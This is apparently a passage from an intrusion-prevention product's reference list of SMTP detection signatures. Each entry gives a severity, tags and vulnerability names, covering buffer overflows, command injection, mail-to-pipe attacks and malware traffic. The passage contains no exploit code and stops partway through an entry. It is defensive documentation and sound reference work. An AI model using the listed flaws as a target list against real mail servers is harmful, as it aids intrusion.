SMTP_CS-Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Novell GroupWise Client detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Novell GroupWise Client, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1321-5242
Vulnerability: Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow
Description:
Back to top

SMTP_CS-Novell-Groupwise-Internet-Agent-RRULE-Parsing-BOF

About this situation: Attempt to exploit a buffer overflow vulnerability in Novell GroupWise Internet Agent detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Novell GroupWise, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-365-4219
Last changed: sgpkg-ips-365-4219
Vulnerability: Novell-Groupwise-Internet-Agent-RRULE-Parsing-BOF
Description:
Back to top

SMTP_CS-OpenSMTPD-Command-Injection-CVE-2020-7247

About this situation: An attempt to exploit a vulnerability in OpenSMTPD detected
Context: SMTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSMTPD, CVE2020, CVE2024, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1220-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: OpenSMTPD_Command-Injection_CVE-2020-7247
Zimbra-Collaboration-Command-Injection-CVE-2024-45519
Description:
Back to top

SMTP_CS-Postfix-IPv6-Relaying-Security-Issue

About this situation: An attempt to exploit a vulnerability in Postfix detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Postfix SMTP Server, CVE2005, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: Postfix-IPv6-Relaying-Security-Issue
Description:
Back to top

SMTP_CS-Postfix-SASL-Auth-Handle-Reuse-Memory-Corruption

About this situation: Attempt to exploit a vulnerability in Postfix SMTP Server detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Postfix SMTP Server, CVE2011, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1188-5242
Vulnerability: Postfix-SASL-Auth-Handle-Reuse-Memory-Corruption
Description:
Back to top

SMTP_CS-Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in RoundCube Webmail detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1661-5242
Last changed: sgpkg-ips-1661-5242
Vulnerability: Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting
Description:
Back to top

SMTP_CS-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: SMTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

SMTP_CS-Small-AVI-Container

About this situation: Detects tiny RIFF-AVI video containers
Context: SMTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-490-5211
Vulnerability: Small-AVI-Container
Description:
Back to top

SMTP_CS-Snake-Keylogger-Infection-Traffic

About this situation: Snake Keylogger infection traffic was detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: Snake-Keylogger-Infection-Traffic
Description:
Back to top

SMTP_CS-SoftiaCom-WMailserver-Buffer-Overflow

About this situation: An attempt to exploit a SoftiaCom WMailserver Buffer Overflow vulnerability detected.
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, SoftiaCom WMailserver, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-735-5211
Vulnerability: SoftiaCom-WMailserver-Buffer-Overflow
Description:
Back to top

SMTP_CS-Suspicious-Command

About this situation: An attempt to exploit a vulnerability
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

SMTP_CS-Suspicious-File

About this situation: A suspicious file has been detected.
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-903-5242
Last changed: sgpkg-ips-1350-5242
Description:
Back to top

SMTP_CS-Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service

About this situation: A Symantec Brightmail AntiSpam Nested Zip Handling Denial of Service vulnerability
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Brightmail AntiSpam, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1009-5242
Vulnerability: Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service
Description:
Back to top

SMTP_CS-Trojan-MSIL-Fergstox-A

About this situation: Trojan MSIL Fergstox A traffic was detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Trojan-MSIL-Fergstox-A
Description:
Back to top

SMTP_CS-YPOPS-Buffer-Overflow

About this situation: An attempt to exploit a YPOPS Buffer Overflow vulnerability detected.
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, YPOPS, CVE2004, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-735-5211
Vulnerability: YPOPS-Buffer-Overflow
Description:
Back to top

SMTP_CS-Zimbra-Collaboration-Command-Injection-CVE-2024-45519

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1785-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: Zimbra-Collaboration-Command-Injection-CVE-2024-45519
Description:
Back to top

SMTP_Debug-Detect

About this situation: DEBUG SMTP backdoor command detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Unix, Any Hardware, Sendmail, CVE1999, Unix not specific, Sendmail not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Debug-Backdoor
Description:
Back to top

SMTP_DirectConnect-Client-To-Client-Handshake

About this situation: Detects DirectConnect client handshake, possible DDOS attempt
Context: SMTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-518-5211
Vulnerability: DirectConnect-ConnectToMe-DOS
Description:
Back to top

SMTP_Dovecot-SASL-Authentication-Component-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Dovecot detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Dovecot, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Dovecot-SASL-Authentication-Component-Denial-Of-Service
Description:
Back to top

SMTP_Dsmtp-Xtellmail-Format-String-System-Compromise

About this situation: Detects dSMTP xtellmail command format string system compromise
Context: SMTP Client Command Stream
Severity: 10
Tags: Unix, Any Hardware, dSMTP, CVE2005, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-26-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: SMTP-Dsmtp-Xtellmail-Format-String-System-Compromise
Description:
Back to top

SMTP_EHLO-Parameters-Invalid

About this situation: Client sent SMTP EHLO command with invalid parameters
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-336-4219
Description: The client sent an SMTP EHLO command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

SMTP_EHLO-Parameters-Invalid-Success

About this situation: SMTP EHLO command with invalid parameters not refused
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-336-4219
Description: The client sent an SMTP EHLO command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. This event was generated because the SMTP server did not send an error reply to the command. Risk analysis: Risk level is medium.
Back to top

SMTP_Etrn-BO-1

About this situation: SMTP command ETRN had long argument(120+), possible BO
Context: SMTP Client Command Stream
Severity: 10
Tags: Any Operating System, Any Hardware, NetWin DMail, CVE2000, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Netwin-Dmail-Etrn-BOF
Description:
Back to top

SMTP_ETRN-Parameters-Invalid

About this situation: Client sent SMTP ETRN command with invalid parameters
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The client sent an SMTP ETRN command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

SMTP_ETRN-Parameters-Invalid-Success

About this situation: SMTP ETRN command with invalid parameters not refused
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The client sent an SMTP ETRN command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. This event was generated because the SMTP server did not send an error reply to the command. Risk analysis: Risk level is medium.
Back to top

SMTP_Etrn-Sendmail-DoS

About this situation: Sendmail ETRN Denial of Service
Context: SMTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Sendmail, CVE1999, Any Operating System not specific, Sendmail not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-811-5242
Vulnerability: Sendmail-Etrn-DoS
Description:
Back to top

SMTP_Eudora-Server-Reply-Handling-BOF

About this situation: Specially crafted SMTP server reply causes exploitable buffer overflow in Eudora
Context: SMTP TCP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Eudora, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-137-2032
Last changed: sgpkg-ips-435-4219
Vulnerability: Eudora-SMTP-Client-BOF
Description:
Back to top

SMTP_Exchange-DoS-MS03-051

About this situation: Exchange Server Denial of Service (MS03-046)
Context: SMTP Client Command Stream
Severity: 10
Tags: Windows, Any Hardware, Exchange Server 2000, Exchange Server 5.5, MS2003, CVE2003, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Exchange-DoS-MS03-046
Description:
Back to top

SMTP_Exchange-Server-X-LINK2STATE-Chunk-System-Compromise

About this situation: Detects X-LINK2STATE buffer overflow attempts against Exchange Server 2000 and 2003
Context: SMTP Client Command Stream
Severity: 10
Tags: Windows, Any Hardware, Exchange Server 2003, Exchange Server 2000, MS2005-04, CVE2005, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Exchange-Server-X-LINK2STATE-Chunk-System-Compromise
Description:
Back to top

SMTP_Exchange-Server-X-LINK2STATE-Chunk-System-Compromise-2

About this situation: Detects X-LINK2STATE buffer overflow attempts against Exchange Server 2000 and 2003
Context: SMTP Client Command Stream
Severity: 10
Tags: Windows, Any Hardware, Exchange Server 2003, Exchange Server 2000, MS2005-04, CVE2005, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-413-4219
Vulnerability: SMTP-Exchange-Server-X-LINK2STATE-Chunk-System-Compromise
Description:
Back to top

SMTP_Exchange-Server-X-LINK2STATE-Chunk-System-Compromise-3

About this situation: Detects X-LINK2STATE buffer overflow attempts against Exchange Server 2000 and 2003
Context: SMTP Client Command Stream
Severity: 10
Tags: Windows, Any Hardware, Exchange Server 2003, Exchange Server 2000, MS2005-04, CVE2005, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Exchange-Server-X-LINK2STATE-Chunk-System-Compromise
Description:
Back to top

SMTP_Exchange-Ssl-PCT-Buffer-Overflow

About this situation: Buffer overflow in Microsoft's SSL Library PCT Protocol
Context: SMTP Client Stream
Severity: 7
Tags: Windows, x86, Exchange Server, MS2004, CVE2003, Windows not specific, Exchange Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-587-5211
Vulnerability: Ssl-PCT-Buffer-Overflow
Description:
Back to top

SMTP_Exim-Bdat-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Exim Project Exim detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1021-5242
Last changed: sgpkg-ips-1021-5242
Vulnerability: Exim-Bdat-Use-After-Free
Description:
Back to top

SMTP_Exim-Etrn-SQL-Injection-CVE-2025-26794

About this situation: An attempt to exploit a vulnerability in Exim
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, CVE2025, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Exim-Etrn-SQL-Injection-CVE-2025-26794
Description:
Back to top

SMTP_Exim-With-Dovecot-Lda-Sender_Address-Parameter-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Exim Project Exim detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-539-5211
Vulnerability: Exim-With-Dovecot-Lda-Sender_Address-Parameter-Remote-Command-Execution
Description:
Back to top

SMTP_Extension-Not-Advertised

About this situation: Client used an ESMTP command or parameter that the server did not advertise
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: A client used an ESMTP command or parameter that the server did not advertise. An SMTP server lists the ESMTP extensions that it supports in an EHLO reply at the beginning of a SMTP session [RFC 2821]. This event was generated because the client sent a command or a command parameter that does not belong to the basic SMTP and that was not advertised by the server in the EHLO reply. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Extension-Not-Advertised-Success

About this situation: SMTP server did not reject ESMTP command or parameter that the server did not advertise
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: An SMTP server did not reject the use of an ESMTP command or parameter that the server did not advertise. An SMTP server lists the ESMTP extensions that it supports in a EHLO reply at the beginning of a SMTP session [RFC 2821]. The client sent a command or a command parameter that does not belong to the basic SMTP and that was not advertised by the server in the EHLO reply. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Format-String-Specifiers-In-Argument-To-EHLO

About this situation: Detects format string specifiers in arguments to the EHLO command
Context: SMTP Client Command Stream
Severity: 7
Tags: Windows, x86, Any Software, CVE2005, Windows not specific, Any Software not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: SMTP-Ipswitch-Collaboration-Suite-Multiple-Commands-Format-String-Vulnerability
Description:
Back to top

SMTP_Format-String-Specifiers-In-Argument-To-Expn

About this situation: Detects format string specifiers in arguments to the EXPN command
Context: SMTP Client Command Stream
Severity: 7
Tags: Windows, x86, Any Software, CVE2005, Windows not specific, Any Software not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: SMTP-Ipswitch-Collaboration-Suite-Multiple-Commands-Format-String-Vulnerability
Description:
Back to top

SMTP_Format-String-Specifiers-In-Argument-To-MAIL

About this situation: Detects format string specifiers in arguments to the MAIL command
Context: SMTP Client Command Stream
Severity: 7
Tags: Windows, x86, Any Software, CVE2001, CVE2005, Windows not specific, Any Software not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: SMTP-Extremail-Flow-Format-Strings-Vulnerability
SMTP-Ipswitch-Collaboration-Suite-Multiple-Commands-Format-String-Vulnerability
Description:
Back to top

SMTP_Format-String-Specifiers-In-Argument-To-RCPT

About this situation: Detects format string specifiers in arguments to the RCPT command
Context: SMTP Client Command Stream
Severity: 7
Tags: Windows, x86, Any Software, CVE2005, Windows not specific, Any Software not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: SMTP-Ipswitch-Collaboration-Suite-Multiple-Commands-Format-String-Vulnerability
Description:
Back to top

SMTP_Forward-Path-Invalid

About this situation: Client sent SMTP RCPT TO command with invalid forward path
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The client sent an SMTP RCPT TO command with invalid forward path. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

SMTP_Forward-Path-Invalid-Success

About this situation: SMTP server did not refuse SMTP RCPT TO command with invalid forward path
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The client sent an SMTP RCPT TO command with invalid forward path. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. This event was generated because the SMTP server did not send an error reply to the command. Risk analysis: Risk level is medium.
Back to top

SMTP_Gnu-C-Library-Gethostbyname-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GNU C Library Project GNU C Library detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, glibc, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Gnu-C-Library-Gethostbyname-Buffer-Overflow
Description:
Back to top

SMTP_Helo-Overflow

About this situation: Possible SMTP HELO buffer overlflow attempt
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic SMTP server, CVE1999, CVE2000, CVE2001, CVE2002, CVE2015, Any Operating System not specific, Generic SMTP server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1194-5242
Vulnerability: SMTP-Sendmail-Helo-Hide-Sender-BOF
SMTP-VirusWall-Helo-BOF
SMTP-Csm-Helo-BOF
SMTP-Imate-Webmail-Helo-BOF
SMTP-Ipswitch-Helo-BOF
SMTP-MDaemon-Helo-BOF
SMTP-Exchange-Helo-BOF
SMTP-Apple-Appleshare-Helo-BOF
SMTP-Apple-Stalker-Helo-BOF
SMTP-Xtramail-Helo-BOF
SMTP-Analogx-Helo-BOF
SMTP-Winsmtp-Helo-BOF
SMTP-Eserv-Helo-BOF
SMTP-Src-Helo-BOF
SMTP-Cmail-Helo-BOF
SMTP-Citadel-Helo-BOF
Gnu-C-Library-Gethostbyname-Buffer-Overflow
Description:
Back to top

SMTP_HELO-Parameters-Invalid

About this situation: Client sent SMTP HELO command with invalid parameters
Context: SMTP without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-605-5211
Description: The client sent an SMTP HELO command with invalid parameters. The parameters may be entirely missing, misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

SMTP_HELO-Parameters-Invalid-Success

About this situation: SMTP HELO command with invalid parameters not refused
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-336-4219
Description: The client sent an SMTP HELO command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. This event was generated because the SMTP server did not send an error reply to the command. Risk analysis: Risk level is medium.
Back to top

SMTP_Help-Overflow

About this situation: Possible SMTP HELP buffer overlflow attempt
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetManage Chameleon, CVE1999, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-333-4219
Last changed: sgpkg-ips-333-4219
Vulnerability: SMTP-Server-HELP-Command-Buffer-Overflow
Description:
Back to top

SMTP_IBM-Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Notes detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Notes, CVE2011, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: IBM-Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow
Description:
Back to top

SMTP_Ipswitch-IMail-Server-SMTP-Service-Buffer-Overflow

About this situation: Detects RCPT command buffer overflow exploits against Ipswitch IMail Server
Context: SMTP Client Command Stream
Severity: 7
Tags: Windows, x86, IMail, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Ipswitch-IMail-Server-SMTP-Service-Buffer-Overflow
Description:
Back to top

SMTP_Lotus-Notes-Relay

About this situation: Possible Unauthorized Relay detected
Context: SMTP Client Command Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Lotus Notes, CVE2001, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: SMTP-Notes-Relay
Description:
Back to top

SMTP_Mail-From-Domain-Random

About this situation: A random string in SMTP Mail From header detected
Context: SMTP Client Command Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1002-5242
Last changed: sgpkg-ips-1016-5242
Description:
Back to top

SMTP_MAIL-FROM-Parameters-Invalid

About this situation: Client sent SMTP MAIL FROM command with invalid parameters
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: The client sent an SMTP MAIL FROM command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

SMTP_MAIL-FROM-Parameters-Invalid-Success

About this situation: SMTP MAIL FROM command with invalid parameters not refused
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: The client sent an SMTP MAIL FROM command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. This event was generated because the SMTP server did not send an error reply to the command. Risk analysis: Risk level is medium.
Back to top

SMTP_Mail-From-Pipe

About this situation: Mail from pipe, possible attack
Context: SMTP Client Command Stream
Severity: 7
Tags: Unix, Any Hardware, Generic SMTP server, CVE1999, Unix not specific, Generic SMTP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Pipe-Sendmail-Attack
Description:
Back to top

SMTP_Mail-From-Recipient-Name-BOF

About this situation: Attempt to exploit buffer overflow vulnerability in SMTP Server detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic SMTP server, CVE1999, CVE2009, Any Operating System not specific, Generic SMTP server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-223-3038
Last changed: sgpkg-ips-469-5211
Vulnerability: Novell-Groupwise-Internet-Agent-Email-Address-Processing-BOF
Cmail-Email-Address-Processing-BOF
Description:
Back to top

SMTP_MAIL-FROM-Reverse-Path-Invalid

About this situation: Client sent SMTP MAIL FROM command with invalid reverse path
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The client sent an SMTP MAIL FROM command with an invalid reverse path. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

SMTP_MAIL-FROM-Reverse-Path-Invalid-Success

About this situation: SMTP MAIL FROM command with invalid reverse path not rejected
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: An SMTP MAIL FROM command with invalid reverse path was not rejected by the server. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. This event was generated because the SMTP server did not send an error reply to the command. Risk analysis: Risk level is medium.
Back to top

SMTP_Mail-From-User-Random

About this situation: A random string in SMTP Mail From header detected
Context: SMTP Client Command Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1334-5242
Last changed: sgpkg-ips-1334-5242
Description:
Back to top

SMTP_Mail-RCPT-To-Pipe

About this situation: Mail to pipe, possible attack
Context: SMTP Client Command Stream
Severity: 7
